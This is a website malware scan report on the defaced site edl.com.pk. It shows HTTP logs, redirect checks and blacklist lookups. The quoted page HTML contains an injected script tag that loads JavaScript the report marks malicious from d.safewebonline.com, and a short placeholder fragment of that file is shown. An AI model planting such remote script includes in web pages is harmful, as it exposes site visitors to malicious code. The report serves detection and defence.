Scanned pages/files
Request | Server response | Status |
http://edl.com.pk/ | 200 OK Content-Length: 11294 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked by $nIp3R ...[620 bytes skipped]... t")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=d134393e0a/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){}; //]]> </script> <script src="http://d.safewebonline.com/l/load.js"></script> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Hacked by $nIp3R</title> <script type="text/javascript"> /* <![CDATA[ */ var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-60479616-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName(' ...[12415 bytes skipped]... | ||
http://d.safewebonline.com/l/load.js | 200 OK Content-Length: 16941 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var data1 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data2 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data3 = { ns4: "[#[NAMESHORT]#]" })(); Antivirus reports:
| ||
http://edl.com.pk/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: edl.com.pk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Oct 2015 18:08:26 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 11294
Content-Type: text/html
Last-Modified: Mon, 14 Sep 2015 12:35:45 GMT
...11294 bytes of data.
GET / HTTP/1.1
Host: edl.com.pk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Oct 2015 18:08:26 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 11294
Content-Type: text/html
Last-Modified: Mon, 14 Sep 2015 12:35:45 GMT
...11294 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: edl.com.pk
Referer: http://www.google.com/search?q=edl.com.pk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: edl.com.pk
Referer: http://www.google.com/search?q=edl.com.pk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=edl.com.pk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://edl.com.pk/
Result: edl.com.pk is not infected or malware details are not published yet.
Result: edl.com.pk is not infected or malware details are not published yet.